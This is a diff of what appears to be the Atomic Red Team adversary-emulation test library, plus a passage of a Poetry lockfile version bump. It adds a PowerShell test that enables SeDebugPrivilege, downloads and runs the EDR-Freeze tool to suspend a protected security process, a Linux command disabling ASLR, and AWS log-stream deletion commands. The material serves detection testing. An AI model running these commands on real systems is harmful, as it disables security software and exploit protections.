+        if (Test-Path $extractFolder) {
+            # Ensure target exe not locked; attempt to stop any running instance silently
+            Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+        }
+        Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+        # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+        $archive = $null
+        try {
+            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+            foreach ($entry in $archive.Entries) {
+                if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                if ($entry.FullName.EndsWith('/')) { # directory entry
+                    $dirPath = Join-Path $extractFolder $entry.FullName
+                    if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                    continue
+                }
+                $destPath = Join-Path $extractFolder $entry.FullName
+                $destDir = Split-Path $destPath -Parent
+                if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                try {
+                    # Use static extension method (PowerShell 5.1 compatible)
+                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                } catch {
+                    Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                }
+            }
+            Write-Host "Extraction completed." -ForegroundColor Green
+        } finally {
+            if ($archive) { $archive.Dispose() }
+        }
+    }
+} catch {
+    Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+}
+
+# Wait 15s before putting targeted process before putting it in the comma
+Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 3
+Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 2
+
+# Put targeted  process in the comma for 15s
+# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+    Sort-Object LastWriteTime -Descending |
+    Select-Object -First 1 -ExpandProperty Name
+if (-not $edrFreezeExeName) {
+    Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+    exit 1
+}
+
+$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+Write-Output "File deleted: $edrFreezeExe"
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux
+Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ac333fe1-ce2b-400b-a117-538634427439
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysctl -w kernel.randomize_va_space=0
+```
+
+#### Cleanup Commands:
+```bash
+sysctl -w kernel.randomize_va_space=2
+```
+
+
+
+
+
 <br/>
@@ -1200,3 +1200,173 @@ atomic_tests:
    cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
    name: powershell
    elevation_required: true
+- name: Freeze PPL-protected process with EDR-Freeze
+  auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+  description: This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+  supported_platforms:
+  - windows
+  input_arguments:
+    processName:
+      type: string
+      default: "SecurityHealthService"
+      description: PPL-protected process name to target
+  executor:
+    command: |-
+      # Enable SeDebugPrivilege
+      Add-Type -TypeDefinition @"
+      using System;
+      using System.Runtime.InteropServices;
+
+      public class TokenAdjuster {
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+              ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+          [StructLayout(LayoutKind.Sequential, Pack = 1)]
+          public struct TOKEN_PRIVILEGES {
+              public int PrivilegeCount;
+              public long Luid;
+              public int Attributes;
+          }
+
+          public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+          public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+          public const uint TOKEN_QUERY = 0x0008;
+
+          public static bool EnableSeDebugPrivilege() {
+              IntPtr hToken;
+              if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+                  return false;
+
+              long luid;
+              if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+                  return false;
+
+              TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+              tp.PrivilegeCount = 1;
+              tp.Luid = luid;
+              tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+              return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+          }
+      }
+      "@
+
+      $result = [TokenAdjuster]::EnableSeDebugPrivilege()
+      if ($result) {
+          Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+      } else {
+          Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+          exit 1
+      }
+
+      # Get basic process info
+      $process = Get-Process -Name $#{processName} -ErrorAction Stop
+      $processName = $process.ProcessName
+      Write-Host "Process Name: $processName)"
+      Write-Host "PID: $($process.Id)"
+              
+      # Get executable path and user info
+      $query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+      $wmiProcess = Get-WmiObject -Query $query
+
+      $owner = $wmiProcess.GetOwner()
+          Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+      # Get the folder of the current script
+      $scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+      # Download latest EDR-Freeze package and extract (force replace)
+      $downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+      $zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+      Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+      try {
+          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+          Write-Host "Download completed: $zipPath" -ForegroundColor Green
+          $extractFolder = $scriptFolder
+          if (Test-Path $zipPath) {
+              Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
+              if (Test-Path $extractFolder) {
+                  # Ensure target exe not locked; attempt to stop any running instance silently
+                  Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+              }
+              Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+              # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+              $archive = $null
+              try {
+                  $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+                  foreach ($entry in $archive.Entries) {
+                      if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                      if ($entry.FullName.EndsWith('/')) { # directory entry
+                          $dirPath = Join-Path $extractFolder $entry.FullName
+                          if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                          continue
+                      }
+                      $destPath = Join-Path $extractFolder $entry.FullName
+                      $destDir = Split-Path $destPath -Parent
+                      if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                      if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                      try {
+                          # Use static extension method (PowerShell 5.1 compatible)
+                          [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                      } catch {
+                          Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                      }
+                  }
+                  Write-Host "Extraction completed." -ForegroundColor Green
+              } finally {
+                  if ($archive) { $archive.Dispose() }
+              }
+          }
+      } catch {
+          Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+      }
+
+      # Wait 15s before putting targeted process before putting it in the comma
+      Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 3
+      Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 2
+
+      # Put targeted  process in the comma for 15s
+      # Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+      $edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+          Sort-Object LastWriteTime -Descending |
+          Select-Object -First 1 -ExpandProperty Name
+      if (-not $edrFreezeExeName) {
+          Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+          exit 1
+      }
+
+      $edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+      Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+      Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+      Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+    cleanup_command: |-
+      Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+      Write-Output "File deleted: $edrFreezeExe"
+    name: powershell
+    elevation_required: true
+- name: Disable ASLR Via sysctl parameters - Linux
+  auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+  description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sysctl -w kernel.randomize_va_space=0
+    cleanup_command: |
+      sysctl -w kernel.randomize_va_space=2
+    name: bash
+    elevation_required: true
@@ -559,9 +559,9 @@ deleting the log stream. Once it is deleted, the logs created by the attackers w
 ```sh
 aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Created ***"
-aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Created ***"
-aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Deleted ***"
 aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Deleted ***"
@@ -388,9 +388,9 @@ atomic_tests:
    command: |
      aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
      echo "*** Log Group Created ***"
-      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
      echo "*** Log Stream Created ***"
-      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
      echo "*** Log Stream Deleted ***"
      aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
      echo "*** Log Group Deleted ***"
@@ -1762,3 +1762,8 @@ b404caaa-12ce-43c7-9214-62a531c044f7
 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
 d2a1f4bc-a064-4223-8281-a086dce5423c
 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+361fe49d-0c19-46ec-a483-ccb92d38e88e
+210be7ea-d841-40ec-b3e1-ff610bb62744
+cbb2573a-a6ad-4c87-aef8-6e175598559b
+ac333fe1-ce2b-400b-a117-538634427439
+6e76f56f-2373-4a6c-a63f-98b7b72761f1
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 2.1.1 and should not be changed by hand.
+# This file is automatically @generated by Poetry 2.2.1 and should not be changed by hand.

 [[package]]
 name = "annotated-types"
@@ -135,14 +135,14 @@ files = [

 [[package]]
 name = "click"
-version = "8.2.1"
+version = "8.3.0"
 description = "Composable command line interface toolkit"
 optional = false
 python-versions = ">=3.10"
 groups = ["main"]
 files = [
-    {file = "click-8.2.1-py3-none-any.whl", hash = "sha256:61a3265b914e850b85317d0b3109c7f8cd35a670f963866005d6ef1d5175a12b"},
-    {file = "click-8.2.1.tar.gz", hash = "sha256:27c491cc05d968d271d5a1db13e3b5a184636d9d930f148c50b038f0d0646202"},
+    {file = "click-8.3.0-py3-none-any.whl", hash = "sha256:9b9f285302c6e3064f4330c05f05b81945b2a39544279343e6e7c5f27a9baddc"},
+    {file = "click-8.3.0.tar.gz", hash = "sha256:e7b8232224eba16f4ebe410c25ced9f7875cb5f3263ffc93cc3e8da705e229c4"},
 ]

 [package.dependencies]
@@ -155,7 +155,7 @@ description = "Cross-platform colored terminal text."
 optional = false
 python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
 groups = ["main"]
-markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
+markers = "platform_system == \"Windows\" or sys_platform == \"win32\""
 files = [
    {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
    {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
@@ -163,14 +163,14 @@ files = [

 [[package]]
 name = "hypothesis"
-version = "6.138.13"
+version = "6.140.2"
 description = "A library for property-based testing"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "hypothesis-6.138.13-py3-none-any.whl", hash = "sha256:09f1130deb08e5d12fb3b59b55c113fd79debaaab9b224ffac17be8341de4326"},
-    {file = "hypothesis-6.138.13.tar.gz", hash = "sha256:2bea91629b8b3bb103a5b51442b1037cede3aae26e56ec063c52b9d5d8eaf70b"},
+    {file = "hypothesis-6.140.2-py3-none-any.whl", hash = "sha256:4524cb84be90961563ef15634e2efe96150bbcce47621a13cff3c1b03a326663"},
+    {file = "hypothesis-6.140.2.tar.gz", hash = "sha256:b3b4a162134eeef8a992621de6c43d80e03d44704a3c3bfb5b9d0661b375b0d2"},
 ]

 [package.dependencies]
@@ -246,14 +246,14 @@ format-nongpl = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-

 [[package]]
 name = "jsonschema-specifications"
-version = "2025.4.1"
+version = "2025.9.1"
 description = "The JSON Schema meta-schemas and vocabularies, exposed as a Registry"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "jsonschema_specifications-2025.4.1-py3-none-any.whl", hash = "sha256:4653bffbd6584f7de83a67e0d620ef16900b390ddc7939d56684d6c81e33f1af"},
-    {file = "jsonschema_specifications-2025.4.1.tar.gz", hash = "sha256:630159c9f4dbea161a6a2205c3011cc4f18ff381b189fff48bb39b9bf26ae608"},
+    {file = "jsonschema_specifications-2025.9.1-py3-none-any.whl", hash = "sha256:98802fee3a11ee76ecaca44429fda8a41bff98b00a0f2838151b113f210cc6fe"},
+    {file = "jsonschema_specifications-2025.9.1.tar.gz", hash = "sha256:b540987f239e745613c7a9176f3edb72b832a4ac465cf02712288397832b5e8d"},
 ]

 [package.dependencies]
@@ -325,14 +325,14 @@ testing = ["coverage", "pytest", "pytest-benchmark"]

 [[package]]
 name = "pydantic"
-version = "2.11.7"
+version = "2.11.10"
 description = "Data validation using Python type hints"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pydantic-2.11.7-py3-none-any.whl", hash = "sha256:dde5df002701f6de26248661f6835bbe296a47bf73990135c7d07ce741b9623b"},
-    {file = "pydantic-2.11.7.tar.gz", hash = "sha256:d989c3c6cb79469287b1569f7447a17848c998458d49ebe294e975b9baf0f0db"},
+    {file = "pydantic-2.11.10-py3-none-any.whl", hash = "sha256:802a655709d49bd004c31e865ef37da30b540786a46bfce02333e0e24b5fe29a"},
+    {file = "pydantic-2.11.10.tar.gz", hash = "sha256:dc280f0982fbda6c38fada4e476dc0a4f3aeaf9c6ad4c28df68a666ec3c61423"},
 ]

 [package.dependencies]
@@ -474,14 +474,14 @@ windows-terminal = ["colorama (>=0.4.6)"]

 [[package]]
 name = "pytest"
-version = "8.4.1"
+version = "8.4.2"
 description = "pytest: simple powerful testing with Python"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pytest-8.4.1-py3-none-any.whl", hash = "sha256:539c70ba6fcead8e78eebbf1115e8b589e7565830d7d006a8723f19ac8a0afb7"},
-    {file = "pytest-8.4.1.tar.gz", hash = "sha256:7c67fd69174877359ed9371ec3af8a3d2b04741818c51e5e99cc1742251fa93c"},
+    {file = "pytest-8.4.2-py3-none-any.whl", hash = "sha256:872f880de3fc3a5bdc88a11b39c9710c3497a547cfa9320bc3c5e62fbf272e79"},
+    {file = "pytest-8.4.2.tar.gz", hash = "sha256:86c0d0b93306b961d58d62a4db4879f27fe25513d4b969df351abdddb3c30e01"},
 ]

 [package.dependencies]
@@ -496,65 +496,85 @@ dev = ["argcomplete", "attrs (>=19.2)", "hypothesis (>=3.56)", "mock", "requests

 [[package]]
 name = "pyyaml"
-version = "6.0.2"
+version = "6.0.3"
 description = "YAML parser and emitter for Python"
 optional = false
 python-versions = ">=3.8"
 groups = ["main"]
 files = [
-    {file = "PyYAML-6.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a9a2848a5b7feac301353437eb7d5957887edbf81d56e903999a75a3d743086"},
-    {file = "PyYAML-6.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:29717114e51c84ddfba879543fb232a6ed60086602313ca38cce623c1d62cfbf"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8824b5a04a04a047e72eea5cec3bc266db09e35de6bdfe34c9436ac5ee27d237"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c36280e6fb8385e520936c3cb3b8042851904eba0e58d277dca80a5cfed590b"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ec031d5d2feb36d1d1a24380e4db6d43695f3748343d99434e6f5f9156aaa2ed"},
-    {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:936d68689298c36b53b29f23c6dbb74de12b4ac12ca6cfe0e047bedceea56180"},
-    {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:23502f431948090f597378482b4812b0caae32c22213aecf3b55325e049a6c68"},
-    {file = "PyYAML-6.0.2-cp310-cp310-win32.whl", hash = "sha256:2e99c6826ffa974fe6e27cdb5ed0021786b03fc98e5ee3c5bfe1fd5015f42b99"},
-    {file = "PyYAML-6.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:a4d3091415f010369ae4ed1fc6b79def9416358877534caf6a0fdd2146c87a3e"},
-    {file = "PyYAML-6.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:cc1c1159b3d456576af7a3e4d1ba7e6924cb39de8f67111c735f6fc832082774"},
-    {file = "PyYAML-6.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1e2120ef853f59c7419231f3bf4e7021f1b936f6ebd222406c3b60212205d2ee"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5d225db5a45f21e78dd9358e58a98702a0302f2659a3c6cd320564b75b86f47c"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ac9328ec4831237bec75defaf839f7d4564be1e6b25ac710bd1a96321cc8317"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ad2a3decf9aaba3d29c8f537ac4b243e36bef957511b4766cb0057d32b0be85"},
-    {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ff3824dc5261f50c9b0dfb3be22b4567a6f938ccce4587b38952d85fd9e9afe4"},
-    {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:797b4f722ffa07cc8d62053e4cff1486fa6dc094105d13fea7b1de7d8bf71c9e"},
-    {file = "PyYAML-6.0.2-cp311-cp311-win32.whl", hash = "sha256:11d8f3dd2b9c1207dcaf2ee0bbbfd5991f571186ec9cc78427ba5bd32afae4b5"},
-    {file = "PyYAML-6.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10ce637b18caea04431ce14fabcf5c64a1c61ec9c56b071a4b7ca131ca52d44"},
-    {file = "PyYAML-6.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:c70c95198c015b85feafc136515252a261a84561b7b1d51e3384e0655ddf25ab"},
-    {file = "PyYAML-6.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ce826d6ef20b1bc864f0a68340c8b3287705cae2f8b4b1d932177dcc76721725"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1f71ea527786de97d1a0cc0eacd1defc0985dcf6b3f17bb77dcfc8c34bec4dc5"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9b22676e8097e9e22e36d6b7bda33190d0d400f345f23d4065d48f4ca7ae0425"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80bab7bfc629882493af4aa31a4cfa43a4c57c83813253626916b8c7ada83476"},
-    {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0833f8694549e586547b576dcfaba4a6b55b9e96098b36cdc7ebefe667dfed48"},
-    {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8b9c7197f7cb2738065c481a0461e50ad02f18c78cd75775628afb4d7137fb3b"},
-    {file = "PyYAML-6.0.2-cp312-cp312-win32.whl", hash = "sha256:ef6107725bd54b262d6dedcc2af448a266975032bc85ef0172c5f059da6325b4"},
-    {file = "PyYAML-6.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:7e7401d0de89a9a855c839bc697c079a4af81cf878373abd7dc625847d25cbd8"},
-    {file = "PyYAML-6.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:efdca5630322a10774e8e98e1af481aad470dd62c3170801852d752aa7a783ba"},
-    {file = "PyYAML-6.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:50187695423ffe49e2deacb8cd10510bc361faac997de9efef88badc3bb9e2d1"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0ffe8360bab4910ef1b9e87fb812d8bc0a308b0d0eef8c8f44e0254ab3b07133"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:17e311b6c678207928d649faa7cb0d7b4c26a0ba73d41e99c4fff6b6c3276484"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b189594dbe54f75ab3a1acec5f1e3faa7e8cf2f1e08d9b561cb41b845f69d5"},
-    {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:41e4e3953a79407c794916fa277a82531dd93aad34e29c2a514c2c0c5fe971cc"},
-    {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:68ccc6023a3400877818152ad9a1033e3db8625d899c72eacb5a668902e4d652"},
-    {file = "PyYAML-6.0.2-cp313-cp313-win32.whl", hash = "sha256:bc2fa7c6b47d6bc618dd7fb02ef6fdedb1090ec036abab80d4681424b84c1183"},
-    {file = "PyYAML-6.0.2-cp313-cp313-win_amd64.whl", hash = "sha256:8388ee1976c416731879ac16da0aff3f63b286ffdd57cdeb95f3f2e085687563"},
-    {file = "PyYAML-6.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:24471b829b3bf607e04e88d79542a9d48bb037c2267d7927a874e6c205ca7e9a"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7fded462629cfa4b685c5416b949ebad6cec74af5e2d42905d41e257e0869f5"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d84a1718ee396f54f3a086ea0a66d8e552b2ab2017ef8b420e92edbc841c352d"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9056c1ecd25795207ad294bcf39f2db3d845767be0ea6e6a34d856f006006083"},
-    {file = "PyYAML-6.0.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:82d09873e40955485746739bcb8b4586983670466c23382c19cffecbf1fd8706"},
-    {file = "PyYAML-6.0.2-cp38-cp38-win32.whl", hash = "sha256:43fa96a3ca0d6b1812e01ced1044a003533c47f6ee8aca31724f78e93ccc089a"},
-    {file = "PyYAML-6.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:01179a4a8559ab5de078078f37e5c1a30d76bb88519906844fd7bdea1b7729ff"},
-    {file = "PyYAML-6.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:688ba32a1cffef67fd2e9398a2efebaea461578b0923624778664cc1c914db5d"},
-    {file = "PyYAML-6.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a8786accb172bd8afb8be14490a16625cbc387036876ab6ba70912730faf8e1f"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8e03406cac8513435335dbab54c0d385e4a49e4945d2909a581c83647ca0290"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f753120cb8181e736c57ef7636e83f31b9c0d1722c516f7e86cf15b7aa57ff12"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b1fdb9dc17f5a7677423d508ab4f243a726dea51fa5e70992e59a7411c89d19"},
-    {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0b69e4ce7a131fe56b7e4d770c67429700908fc0752af059838b1cfb41960e4e"},
-    {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:a9f8c2e67970f13b16084e04f134610fd1d374bf477b17ec1599185cf611d725"},
-    {file = "PyYAML-6.0.2-cp39-cp39-win32.whl", hash = "sha256:6395c297d42274772abc367baaa79683958044e5d3835486c16da75d2a694631"},
-    {file = "PyYAML-6.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:39693e1f8320ae4f43943590b49779ffb98acb81f788220ea932a6b6c51004d8"},
-    {file = "pyyaml-6.0.2.tar.gz", hash = "sha256:d584d9ec91ad65861cc08d42e834324ef890a082e591037abe114850ff7bbc3e"},
